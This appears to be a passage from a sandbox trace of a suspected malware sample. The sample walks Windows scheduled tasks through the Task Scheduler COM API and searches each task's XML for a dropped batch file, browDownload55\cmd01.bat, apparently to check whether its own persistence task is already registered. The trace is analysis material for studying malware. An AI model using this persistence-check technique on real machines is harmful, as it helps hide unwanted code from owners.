lpSystemTimeAsFileTime=0xcecc8*(dwLowDateTime=0xecd2c573, dwHighDateTime=0x1d7b3c9)) [0161.581] GetTickCount () returned 0xeb8fc1 [0161.581] GetTickCount () returned 0xeb8fc1 [0161.581] GetVersion () returned 0x295a000a [0161.582] CoCreateInstance (in: rclsid=0x1288ba*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1288fa*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x1289ac | out: ppv=0x1289ac*=0x927500) returned 0x0 [0162.262] TaskScheduler:ITaskService:Connect (This=0x927500, serverName=0xce810*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), user=0xce828*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), domain=0xce840*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0xce858*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0 [0162.266] TaskScheduler:ITaskService:GetFolder (in: This=0x927500, Path=0x0, ppFolder=0xce720 | out: ppFolder=0xce720*=0x9276b0) returned 0x0 [0162.267] ITaskFolder:GetTasks (in: This=0x9276b0, flags=1, ppTasks=0xce560 | out: ppTasks=0xce560*=0x928e80) returned 0x0 [0162.267] IRegisteredTaskCollection:get_Count (in: This=0x928e80, pCount=0xce558 | out: pCount=0xce558*=1) returned 0x0 [0162.267] IRegisteredTaskCollection:get_Item (in: This=0x928e80, index=0xce5a8*(varType=0x3, wReserved1=0x0, wReserved2=0x7ffb, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce548 | out: ppRegisteredTask=0xce548*=0x928f50) returned 0x0 [0162.268] IRegisteredTask:get_Name (in: This=0x928f50, pName=0xce568 | out: pName=0xce568*="User_Feed_Synchronization-{3C8C073D-3832-49FF-8EB9-CF5FBFBE6112}") returned 0x0 [0162.268] IRegisteredTask:get_Xml (in: This=0x928f50, pXml=0xce540 | out: pXml=0xce540*="\r\n\r\n \r\n XC64ZB\\RDhJ0CNFevzX\r\n Updates out-of-date system feeds.\r\n \\User_Feed_Synchronization-{3C8C073D-3832-49FF-8EB9-CF5FBFBE6112}\r\n \r\n \r\n \r\n S-1-5-21-1560258661-3990802383-1811730007-1000\r\n InteractiveToken\r\n \r\n \r\n \r\n false\r\n false\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2021-09-28T02:09:29+02:00\r\n 2031-09-28T02:09:29+02:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n C:\\Windows\\system32\\msfeedssync.exe\r\n sync\r\n \r\n \r\n") returned 0x0 [0162.269] StrStrIW (lpFirst="\r\n\r\n \r\n XC64ZB\\RDhJ0CNFevzX\r\n Updates out-of-date system feeds.\r\n \\User_Feed_Synchronization-{3C8C073D-3832-49FF-8EB9-CF5FBFBE6112}\r\n \r\n \r\n \r\n S-1-5-21-1560258661-3990802383-1811730007-1000\r\n InteractiveToken\r\n \r\n \r\n \r\n false\r\n false\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2021-09-28T02:09:29+02:00\r\n 2031-09-28T02:09:29+02:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n C:\\Windows\\system32\\msfeedssync.exe\r\n sync\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.269] IUnknown:Release (This=0x928f50) returned 0x0 [0162.269] IUnknown:Release (This=0x928e80) returned 0x0 [0162.269] ITaskFolder:GetFolders (in: This=0x9276b0, flags=0, ppFolders=0xce548 | out: ppFolders=0xce548*=0x928e80) returned 0x0 [0162.270] ITaskFolderCollection:get_Count (in: This=0x928e80, pCount=0xce554 | out: pCount=0xce554*=1) returned 0x0 [0162.270] ITaskFolderCollection:get_Item (in: This=0x928e80, index=0xce590*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0xce540 | out: ppFolder=0xce540*=0x928f60) returned 0x0 [0162.270] ITaskFolder:GetTasks (in: This=0x928f60, flags=1, ppTasks=0xce3b0 | out: ppTasks=0xce3b0*=0x929000) returned 0x0 [0162.271] IRegisteredTaskCollection:get_Count (in: This=0x929000, pCount=0xce3a8 | out: pCount=0xce3a8*=0) returned 0x0 [0162.271] IUnknown:Release (This=0x929000) returned 0x0 [0162.271] ITaskFolder:GetFolders (in: This=0x928f60, flags=0, ppFolders=0xce398 | out: ppFolders=0xce398*=0x929000) returned 0x0 [0162.271] ITaskFolderCollection:get_Count (in: This=0x929000, pCount=0xce3a4 | out: pCount=0xce3a4*=2) returned 0x0 [0162.271] ITaskFolderCollection:get_Item (in: This=0x929000, index=0xce3e0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0xce390 | out: ppFolder=0xce390*=0x929170) returned 0x0 [0162.271] ITaskFolder:GetTasks (in: This=0x929170, flags=1, ppTasks=0xce200 | out: ppTasks=0xce200*=0x929220) returned 0x0 [0162.273] IRegisteredTaskCollection:get_Count (in: This=0x929220, pCount=0xce1f8 | out: pCount=0xce1f8*=4) returned 0x0 [0162.273] IRegisteredTaskCollection:get_Item (in: This=0x929220, index=0xce248*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce1e8 | out: ppRegisteredTask=0xce1e8*=0x929390) returned 0x0 [0162.273] IRegisteredTask:get_Name (in: This=0x929390, pName=0xce208 | out: pName=0xce208*="Office Automatic Updates") returned 0x0 [0162.273] IRegisteredTask:get_Xml (in: This=0x929390, pXml=0xce1e0 | out: pXml=0xce1e0*="\r\n\r\n \r\n 2013-07-10T17:35:18.0059379\r\n Microsoft Office\r\n This task ensures that your Microsoft Office installation can check for updates.\r\n \\Microsoft\\Office\\Office Automatic Updates\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n \r\n 3\r\n PT30M\r\n \r\n true\r\n true\r\n \r\n false\r\n false\r\n \r\n \r\n \r\n \r\n 2010-12-16T03:00:00\r\n PT4H\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n P3D\r\n PT15M\r\n \r\n PT30M\r\n PT1H\r\n \r\n \r\n \r\n \r\n \r\n C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n /update SCHEDULEDTASK displaylevel=False\r\n \r\n \r\n") returned 0x0 [0162.283] StrStrIW (lpFirst="\r\n\r\n \r\n 2013-07-10T17:35:18.0059379\r\n Microsoft Office\r\n This task ensures that your Microsoft Office installation can check for updates.\r\n \\Microsoft\\Office\\Office Automatic Updates\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n \r\n 3\r\n PT30M\r\n \r\n true\r\n true\r\n \r\n false\r\n false\r\n \r\n \r\n \r\n \r\n 2010-12-16T03:00:00\r\n PT4H\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n P3D\r\n PT15M\r\n \r\n PT30M\r\n PT1H\r\n \r\n \r\n \r\n \r\n \r\n C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n /update SCHEDULEDTASK displaylevel=False\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.283] IUnknown:Release (This=0x929390) returned 0x0 [0162.283] IRegisteredTaskCollection:get_Item (in: This=0x929220, index=0xce248*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce1e8 | out: ppRegisteredTask=0xce1e8*=0x929390) returned 0x0 [0162.283] IRegisteredTask:get_Name (in: This=0x929390, pName=0xce208 | out: pName=0xce208*="Office ClickToRun Service Monitor") returned 0x0 [0162.283] IRegisteredTask:get_Xml (in: This=0x929390, pXml=0xce1e0 | out: pXml=0xce1e0*="\r\n\r\n \r\n 2005-10-11T13:21:17-08:00\r\n Microsoft Office\r\n This task monitors the state of your Microsoft Office ClickToRunSvc and sends crash and error logs to Microsoft.\r\n \\Microsoft\\Office\\Office ClickToRun Service Monitor\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT30M\r\n IgnoreNew\r\n true\r\n \r\n false\r\n false\r\n \r\n \r\n \r\n \r\n 2010-12-16T04:00:00\r\n \r\n P1D\r\n \r\n PT6H\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n /WatchService\r\n \r\n \r\n") returned 0x0 [0162.284] StrStrIW (lpFirst="\r\n\r\n \r\n 2005-10-11T13:21:17-08:00\r\n Microsoft Office\r\n This task monitors the state of your Microsoft Office ClickToRunSvc and sends crash and error logs to Microsoft.\r\n \\Microsoft\\Office\\Office ClickToRun Service Monitor\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT30M\r\n IgnoreNew\r\n true\r\n \r\n false\r\n false\r\n \r\n \r\n \r\n \r\n 2010-12-16T04:00:00\r\n \r\n P1D\r\n \r\n PT6H\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n /WatchService\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.285] IUnknown:Release (This=0x929390) returned 0x0 [0162.285] IRegisteredTaskCollection:get_Item (in: This=0x929220, index=0xce248*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0xce1e8 | out: ppRegisteredTask=0xce1e8*=0x929390) returned 0x0 [0162.285] IRegisteredTask:get_Name (in: This=0x929390, pName=0xce208 | out: pName=0xce208*="OfficeTelemetryAgentFallBack2016") returned 0x0 [0162.285] IRegisteredTask:get_Xml (in: This=0x929390, pXml=0xce1e0 | out: pXml=0xce1e0*="\r\n\r\n \r\n This task initiates the background task for Office Telemetry Agent, which scans and uploads usage and error information for Office solutions.\r\n \\Microsoft\\Office\\OfficeTelemetryAgentFallBack2016\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT0S\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n \r\n \r\n \r\n PT30M\r\n \r\n PT12H\r\n \r\n \r\n \r\n \r\n \r\n C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\msoia.exe\r\n scan upload mininterval:2880\r\n \r\n \r\n") returned 0x0 [0162.287] StrStrIW (lpFirst="\r\n\r\n \r\n This task initiates the background task for Office Telemetry Agent, which scans and uploads usage and error information for Office solutions.\r\n \\Microsoft\\Office\\OfficeTelemetryAgentFallBack2016\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT0S\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n \r\n \r\n \r\n PT30M\r\n \r\n PT12H\r\n \r\n \r\n \r\n \r\n \r\n C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\msoia.exe\r\n scan upload mininterval:2880\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.287] IUnknown:Release (This=0x929390) returned 0x0 [0162.287] IRegisteredTaskCollection:get_Item (in: This=0x929220, index=0xce248*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0xce1e8 | out: ppRegisteredTask=0xce1e8*=0x929390) returned 0x0 [0162.287] IRegisteredTask:get_Name (in: This=0x929390, pName=0xce208 | out: pName=0xce208*="OfficeTelemetryAgentLogOn2016") returned 0x0 [0162.287] IRegisteredTask:get_Xml (in: This=0x929390, pXml=0xce1e0 | out: pXml=0xce1e0*="\r\n\r\n \r\n This task initiates Office Telemetry Agent, which scans and uploads usage and error information for Office solutions when a user logs on to the computer.\r\n \\Microsoft\\Office\\OfficeTelemetryAgentLogOn2016\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n PT0S\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n \r\n \r\n \r\n \r\n PT8H\r\n \r\n \r\n \r\n \r\n \r\n C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\msoia.exe\r\n scan upload\r\n \r\n \r\n") returned 0x0 [0162.289] StrStrIW (lpFirst="\r\n\r\n \r\n This task initiates Office Telemetry Agent, which scans and uploads usage and error information for Office solutions when a user logs on to the computer.\r\n \\Microsoft\\Office\\OfficeTelemetryAgentLogOn2016\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n PT0S\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n \r\n \r\n \r\n \r\n PT8H\r\n \r\n \r\n \r\n \r\n \r\n C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\msoia.exe\r\n scan upload\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.289] IUnknown:Release (This=0x929390) returned 0x0 [0162.289] IUnknown:Release (This=0x929220) returned 0x0 [0162.289] ITaskFolder:GetFolders (in: This=0x929170, flags=0, ppFolders=0xce1e8 | out: ppFolders=0xce1e8*=0x929220) returned 0x0 [0162.289] ITaskFolderCollection:get_Count (in: This=0x929220, pCount=0xce1f4 | out: pCount=0xce1f4*=0) returned 0x0 [0162.289] IUnknown:Release (This=0x929220) returned 0x0 [0162.289] TaskScheduler:IUnknown:Release (This=0x929170) returned 0x0 [0162.289] ITaskFolderCollection:get_Item (in: This=0x929000, index=0xce3e0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppFolder=0xce390 | out: ppFolder=0xce390*=0x929170) returned 0x0 [0162.289] ITaskFolder:GetTasks (in: This=0x929170, flags=1, ppTasks=0xce200 | out: ppTasks=0xce200*=0x929220) returned 0x0 [0162.293] IRegisteredTaskCollection:get_Count (in: This=0x929220, pCount=0xce1f8 | out: pCount=0xce1f8*=0) returned 0x0 [0162.293] IUnknown:Release (This=0x929220) returned 0x0 [0162.293] ITaskFolder:GetFolders (in: This=0x929170, flags=0, ppFolders=0xce1e8 | out: ppFolders=0xce1e8*=0x929220) returned 0x0 [0162.296] ITaskFolderCollection:get_Count (in: This=0x929220, pCount=0xce1f4 | out: pCount=0xce1f4*=84) returned 0x0 [0162.296] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.296] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.297] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=4) returned 0x0 [0162.297] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929600) returned 0x0 [0162.297] IRegisteredTask:get_Name (in: This=0x929600, pName=0xce058 | out: pName=0xce058*=".NET Framework NGEN v4.0.30319") returned 0x0 [0162.297] IRegisteredTask:get_Xml (in: This=0x929600, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2010-09-30T14:53:37.9516706\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)(A;;FRFX;;;LS)\r\n \\Microsoft\\Windows\\.NET Framework\\.NET Framework NGEN v4.0.30319\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT2H\r\n true\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n PT5M\r\n \r\n \r\n \r\n \r\n {84F0FAE1-C27B-4F6F-807B-28CF6F96287D}\r\n \r\n \r\n \r\n") returned 0x0 [0162.297] StrStrIW (lpFirst="\r\n\r\n \r\n 2010-09-30T14:53:37.9516706\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)(A;;FRFX;;;LS)\r\n \\Microsoft\\Windows\\.NET Framework\\.NET Framework NGEN v4.0.30319\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT2H\r\n true\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n PT5M\r\n \r\n \r\n \r\n \r\n {84F0FAE1-C27B-4F6F-807B-28CF6F96287D}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.298] IUnknown:Release (This=0x929600) returned 0x0 [0162.298] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929600) returned 0x0 [0162.298] IRegisteredTask:get_Name (in: This=0x929600, pName=0xce058 | out: pName=0xce058*=".NET Framework NGEN v4.0.30319 64") returned 0x0 [0162.298] IRegisteredTask:get_Xml (in: This=0x929600, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2010-09-30T14:53:37.9516706\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)(A;;FRFX;;;LS)\r\n \\Microsoft\\Windows\\.NET Framework\\.NET Framework NGEN v4.0.30319 64\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT2H\r\n true\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n PT5M\r\n \r\n \r\n \r\n \r\n {429BC048-379E-45E0-80E4-EB1977941B5C}\r\n \r\n \r\n \r\n") returned 0x0 [0162.298] StrStrIW (lpFirst="\r\n\r\n \r\n 2010-09-30T14:53:37.9516706\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)(A;;FRFX;;;LS)\r\n \\Microsoft\\Windows\\.NET Framework\\.NET Framework NGEN v4.0.30319 64\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT2H\r\n true\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n PT5M\r\n \r\n \r\n \r\n \r\n {429BC048-379E-45E0-80E4-EB1977941B5C}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.298] IUnknown:Release (This=0x929600) returned 0x0 [0162.298] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929600) returned 0x0 [0162.299] IRegisteredTask:get_Name (in: This=0x929600, pName=0xce058 | out: pName=0xce058*=".NET Framework NGEN v4.0.30319 64 Critical") returned 0x0 [0162.299] IRegisteredTask:get_Xml (in: This=0x929600, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2010-09-30T14:53:37.9516706\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)(A;;FRFX;;;LS)\r\n \\Microsoft\\Windows\\.NET Framework\\.NET Framework NGEN v4.0.30319 64 Critical\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT2H\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n {613FBA38-A3DF-4AB8-9674-5604984A299A}\r\n \r\n \r\n \r\n") returned 0x0 [0162.299] StrStrIW (lpFirst="\r\n\r\n \r\n 2010-09-30T14:53:37.9516706\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)(A;;FRFX;;;LS)\r\n \\Microsoft\\Windows\\.NET Framework\\.NET Framework NGEN v4.0.30319 64 Critical\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT2H\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n {613FBA38-A3DF-4AB8-9674-5604984A299A}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.299] IUnknown:Release (This=0x929600) returned 0x0 [0162.299] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929600) returned 0x0 [0162.299] IRegisteredTask:get_Name (in: This=0x929600, pName=0xce058 | out: pName=0xce058*=".NET Framework NGEN v4.0.30319 Critical") returned 0x0 [0162.299] IRegisteredTask:get_Xml (in: This=0x929600, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2010-09-30T14:53:37.9516706\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)(A;;FRFX;;;LS)\r\n \\Microsoft\\Windows\\.NET Framework\\.NET Framework NGEN v4.0.30319 Critical\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT2H\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n {DE434264-8FE9-4C0B-A83B-89EBEEBFF78E}\r\n \r\n \r\n \r\n") returned 0x0 [0162.300] StrStrIW (lpFirst="\r\n\r\n \r\n 2010-09-30T14:53:37.9516706\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)(A;;FRFX;;;LS)\r\n \\Microsoft\\Windows\\.NET Framework\\.NET Framework NGEN v4.0.30319 Critical\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT2H\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n {DE434264-8FE9-4C0B-A83B-89EBEEBFF78E}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.300] IUnknown:Release (This=0x929600) returned 0x0 [0162.300] IUnknown:Release (This=0x929470) returned 0x0 [0162.300] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.300] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.301] IUnknown:Release (This=0x929470) returned 0x0 [0162.301] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.301] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.301] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x9294c0) returned 0x0 [0162.301] IRegisteredTaskCollection:get_Count (in: This=0x9294c0, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0162.301] IRegisteredTaskCollection:get_Item (in: This=0x9294c0, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929690) returned 0x0 [0162.301] IRegisteredTask:get_Name (in: This=0x929690, pName=0xce058 | out: pName=0xce058*="AD RMS Rights Policy Template Management (Automated)") returned 0x0 [0162.301] IRegisteredTask:get_Xml (in: This=0x929690, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2006-11-10T14:29:55.5851926\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6001)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6002)\r\n \\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Automated)\r\n \r\n \r\n \r\n S-1-1-0\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT1H\r\n Parallel\r\n true\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2006-11-09T03:00:00\r\n PT1H\r\n \r\n 1\r\n \r\n \r\n \r\n PT1H\r\n \r\n \r\n \r\n \r\n {CF2CF428-325B-48D3-8CA8-7633E36E5A32}\r\n \r\n \r\n") returned 0x0 [0162.303] StrStrIW (lpFirst="\r\n\r\n \r\n 2006-11-10T14:29:55.5851926\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6001)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6002)\r\n \\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Automated)\r\n \r\n \r\n \r\n S-1-1-0\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT1H\r\n Parallel\r\n true\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2006-11-09T03:00:00\r\n PT1H\r\n \r\n 1\r\n \r\n \r\n \r\n PT1H\r\n \r\n \r\n \r\n \r\n {CF2CF428-325B-48D3-8CA8-7633E36E5A32}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.303] IUnknown:Release (This=0x929690) returned 0x0 [0162.303] IRegisteredTaskCollection:get_Item (in: This=0x9294c0, index=0xce098*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929690) returned 0x0 [0162.303] IRegisteredTask:get_Name (in: This=0x929690, pName=0xce058 | out: pName=0xce058*="AD RMS Rights Policy Template Management (Manual)") returned 0x0 [0162.303] IRegisteredTask:get_Xml (in: This=0x929690, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2006-11-10T14:29:55.5851926\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6001)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6003)\r\n \\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Manual)\r\n \r\n \r\n \r\n S-1-1-0\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n PT1H\r\n Parallel\r\n true\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n false\r\n PT1H\r\n \r\n \r\n \r\n \r\n 